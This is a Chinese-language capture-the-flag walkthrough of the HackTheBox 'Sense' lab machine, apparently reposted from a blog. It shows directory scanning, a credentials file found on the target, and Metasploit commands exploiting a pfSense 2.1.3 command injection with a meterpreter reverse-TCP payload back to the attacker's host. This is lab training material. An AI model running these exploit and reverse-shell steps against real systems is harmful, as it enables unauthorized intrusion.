欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 游戏 > HackTheBox-Machines--Sense

HackTheBox-Machines--Sense

2024/10/24 11:16:02 来源:https://blog.csdn.net/sycamorelg/article/details/139356683  浏览:    关键词:HackTheBox-Machines--Sense
Popcorn 测试过程

1 信息收集

  服务器开启80、443端口

在这里插入图片描述

80端口

  访问 80 跳转到 443 – https://10.129.196.51/ ,该页面是 pfSense 登录界面,默认密码是: admin/pfSense,使用默认账号密码登录失败

在这里插入图片描述

目录扫描

./gobuster dir -u https://10.129.196.51/ -w directory-list-2.3-medium.txt -k

  扫描结果没有发现可利用的目录文件

在这里插入图片描述

  继续进行目录扫描,扫描条件添加 txt、conf、php等文件

./gobuster dir -u https://10.129.196.51/ -w directory-list-2.3-medium.txt -k -x txt,php,conf

  发现 /changelog.txt 文件:
  查看文件内容,内容显示三个漏洞已经修复了两个,还有一个没有修复,那我们可以搜索 pfsense 的相关漏洞,进行测试。

在这里插入图片描述

  发现 /system-users.txt 文件,文件显示了账号密码: rohit / pfsense

在这里插入图片描述

  使用 rohit / pfsense 登录,登录后页面显示版本号码:2.1.3

在这里插入图片描述


2 pfsense 漏洞测试

  登录后的站点,发现 pfsense的版本号为:2.1.3 ,searchsploit 搜索相关版本漏洞,发现存在命令注入漏洞,这个漏洞应该就是 /changelog.txt 文件描述的未修补的漏洞。

search pfsense 2.1.3
use exploit/unix/http/pfsense_graph_injection_exec
set payload php/meterpreter/reverse_tcp
set RHOSTS 10.129.196.51
set LHOST 10.10.14.25
# 默认的USERNAME配置为admin,需要更改为rohit
set USERNAME rohit
run

在这里插入图片描述

shell
python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com